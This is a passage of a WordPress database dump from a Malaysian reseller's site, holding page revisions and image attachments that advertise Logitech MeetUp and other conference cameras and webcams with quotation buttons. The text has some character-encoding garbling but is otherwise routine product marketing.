MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-03-04 10:00:14','2019-03-04 02:00:14','',16,'https://bintara.com.my/blog/2019/03/04/16-revision-v1/',0,'revision','',0),(2928,1,'2019-03-04 10:03:40','2019-03-04 02:03:40','<h2>MEETUP</h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms</p><ul><li>See everyone, even those close to the camera</li><li>RightSenseâ„¢ Technologies with automatic framing</li><li>Compact design minimizes cabling and clutter</li></ul>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>PERFECT FOR SMALL ROOMS</h2><p>MeetUp is Logitechâ€™s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsightâ„¢ auto framing plus a pan/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.</p>https://youtu.be/tD_tmRMN2OA<h3>A WIDE VIEW FOR TIGHT SPACES</h3><p>LogitechÂ® MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.</p><h3>HEARING IS BELIEVING</h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUpâ€™s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		https://youtu.be/CqeUIzYth_w<h3>AS EASY AS PLUG AND PLAY</h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.</p><h3>DESIGNED FOR THE WAY PEOPLE MEET</h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.</p>https://youtu.be/4xwIpyv3KOs		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"7f589de\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"7f589de\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"7f589de\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n		<h3>EXTRAS PROVIDE MORE CONVENIENCE</h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.</p><h4>5X ZOOM</h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.</p><h4>PREMIUM CAMERA OPTICS</h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a â€œfisheyeâ€ effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.</p><h4>EXPANSION MIC-READY</h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUpâ€™s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.</p><h4>CERTIFIED FOR BUSINESS</h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft CortanaÂ®, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.</p><h4>BLUETOOTHÂ® SPEAKERPHONE</h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices canâ€™t match.</p><h4>TAKE CONTROL</h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.</p><h4>VERSATILE TV MOUNT</h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.</p><h4>RIGHTSENSE</h4><p>Logitech RightSenseâ„¢ proactive technologies make better video meetings easy and automatic.HÂ® RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.</p><p>[maxbutton id=\"3\"]</p>','Logitech MEETUP','','publish','closed','closed','','logitech-meetup','','','2019-03-04 14:24:46','2019-03-04 06:24:46','',0,'https://bintara.com.my/?page_id=2928',0,'page','',0),(2929,1,'2019-03-04 10:03:40','2019-03-04 02:03:40','','Logitech MEETUP','','inherit','closed','closed','','2928-revision-v1','','','2019-03-04 10:03:40','2019-03-04 02:03:40','',2928,'https://bintara.com.my/blog/2019/03/04/2928-revision-v1/',0,'revision','',0),(2930,1,'2019-03-04 10:08:08','2019-03-04 02:08:08','','meetup-conference-cam','','inherit','closed','closed','','meetup-conference-cam-2','','','2019-03-04 10:08:08','2019-03-04 02:08:08','',2928,'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg',0,'attachment','image/jpeg',0),(2950,1,'2019-03-04 11:12:33','2019-03-04 03:12:33','<h2>MEETUP</h2>\r\nAll-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms\r\n<ul>\r\n 	<li>See everyone, even those close to the camera</li>\r\n 	<li>RightSenseâ„¢ Technologies with automatic framing</li>\r\n 	<li>Compact design minimizes cabling and clutter</li>\r\n</ul>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" sizes=\"(max-width: 300px) 100vw, 300px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" alt=\"\" width=\"300\" height=\"300\" />\r\n<h2>PERFECT FOR SMALL ROOMS</h2>\r\nMeetUp is Logitechâ€™s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsightâ„¢ auto framing plus a pan/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.\r\n\r\nhttps://youtu.be/tD_tmRMN2OA\r\n<h3>A WIDE VIEW FOR TIGHT SPACES</h3>\r\nLogitechÂ® MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.\r\n<h3>HEARING IS BELIEVING</h3>\r\nHoused within a patent-pending anti-vibration enclosure, three beamforming mics MeetUpâ€™s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\nhttps://youtu.be/CqeUIzYth_w\r\n<h3>AS EASY AS PLUG AND PLAY</h3>\r\nStep into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.\r\n<h3>DESIGNED FOR THE WAY PEOPLE MEET</h3>\r\nSmall conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.\r\n\r\nhttps://youtu.be/4xwIpyv3KOs\r\n<figure><img src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-300x169.jpg\" alt=\"meetup-conference-cam (3)\" /></figure>\r\n<figure><img src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-300x169.jpg\" alt=\"meetup-conference-cam (2)\" /></figure>\r\n<figure><img src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-1-300x169.jpg\" alt=\"meetup-conference-cam (1)\" /></figure>\r\n<h3>EXTRAS PROVIDE MORE CONVENIENCE</h3>\r\nOur free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.\r\n<h4>5X ZOOM</h4>\r\nPerfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.\r\n<h4>PREMIUM CAMERA OPTICS</h4>\r\nMeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a â€œfisheyeâ€ effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.\r\n<h4>EXPANSION MIC-READY</h4>\r\nLogitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUpâ€™s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.\r\n<h4>CERTIFIED FOR BUSINESS</h4>\r\nMeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft CortanaÂ®, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.\r\n<h4>BLUETOOTHÂ® SPEAKERPHONE</h4>\r\nAlready connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices canâ€™t match.\r\n<h4>TAKE CONTROL</h4>\r\nMeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.\r\n<h4>VERSATILE TV MOUNT</h4>\r\nLogitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.\r\n<h4>RIGHTSENSE</h4>\r\nLogitech RightSenseâ„¢ proactive technologies make better video meetings easy and automatic.HÂ® RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.','Logitech MEETUP','','inherit','closed','closed','','2928-revision-v1','','','2019-03-04 11:12:33','2019-03-04 03:12:33','',2928,'https://bintara.com.my/blog/2019/03/04/2928-revision-v1/',0,'revision','',0),(2935,1,'2019-03-04 10:20:40','2019-03-04 02:20:40','<h2>MEETUP</h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms</p><ul><li>See everyone, even those close to the camera</li><li>RightSenseâ„¢ Technologies with automatic framing</li><li>Compact design minimizes cabling and clutter</li></ul>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h2>PERFECT FOR SMALL ROOMS</h2><p>MeetUp is Logitechâ€™s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsightâ„¢ auto framing plus a pan/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.</p>https://youtu.be/tD_tmRMN2OA<h3>A WIDE VIEW FOR TIGHT SPACES</h3><p>LogitechÂ® MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.</p><h3>HEARING IS BELIEVING</h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUpâ€™s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		https://youtu.be/CqeUIzYth_w<h3>AS EASY AS PLUG AND PLAY</h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.</p><h3>DESIGNED FOR THE WAY PEOPLE MEET</h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.</p>https://youtu.be/4xwIpyv3KOs		\n				<figure><img src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-300x169.jpg\" alt=\"meetup-conference-cam (3)\" /></figure><figure><img src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-300x169.jpg\" alt=\"meetup-conference-cam (2)\" /></figure><figure><img src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-1-300x169.jpg\" alt=\"meetup-conference-cam (1)\" /></figure>			\n		<h3>EXTRAS PROVIDE MORE CONVENIENCE</h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.</p><h4>5X ZOOM</h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.</p><h4>PREMIUM CAMERA OPTICS</h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a â€œfisheyeâ€ effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.</p><h4>EXPANSION MIC-READY</h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUpâ€™s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.</p><h4>CERTIFIED FOR BUSINESS</h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft CortanaÂ®, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.</p><h4>BLUETOOTHÂ® SPEAKERPHONE</h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices canâ€™t match.</p><h4>TAKE CONTROL</h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.</p><h4>VERSATILE TV MOUNT</h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.</p><h4>RIGHTSENSE</h4><p>Logitech RightSenseâ„¢ proactive technologies make better video meetings easy and automatic.HÂ® RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.</p>','Logitech MEETUP','','inherit','closed','closed','','2928-revision-v1','','','2019-03-04 10:20:40','2019-03-04 02:20:40','',2928,'https://bintara.com.my/blog/2019/03/04/2928-revision-v1/',0,'revision','',0),(2932,1,'2019-03-04 10:12:08','2019-03-04 02:12:08','','meetup-conference-cam (3)','','inherit','closed','closed','','meetup-conference-cam-3','','','2019-03-04 10:12:08','2019-03-04 02:12:08','',2928,'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3.jpg',0,'attachment','image/jpeg',0),(2933,1,'2019-03-04 10:12:14','2019-03-04 02:12:14','','meetup-conference-cam (2)','','inherit','closed','closed','','meetup-conference-cam-2-2','','','2019-03-04 10:12:14','2019-03-04 02:12:14','',2928,'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2.jpg',0,'attachment','image/jpeg',0),(2934,1,'2019-03-04 10:12:17','2019-03-04 02:12:17','','meetup-conference-cam (1)','','inherit','closed','closed','','meetup-conference-cam-1','','','2019-03-04 10:12:17','2019-03-04 02:12:17','',2928,'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-1.jpg',0,'attachment','image/jpeg',0),(2936,1,'2019-03-04 10:22:27','2019-03-04 02:22:27','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, 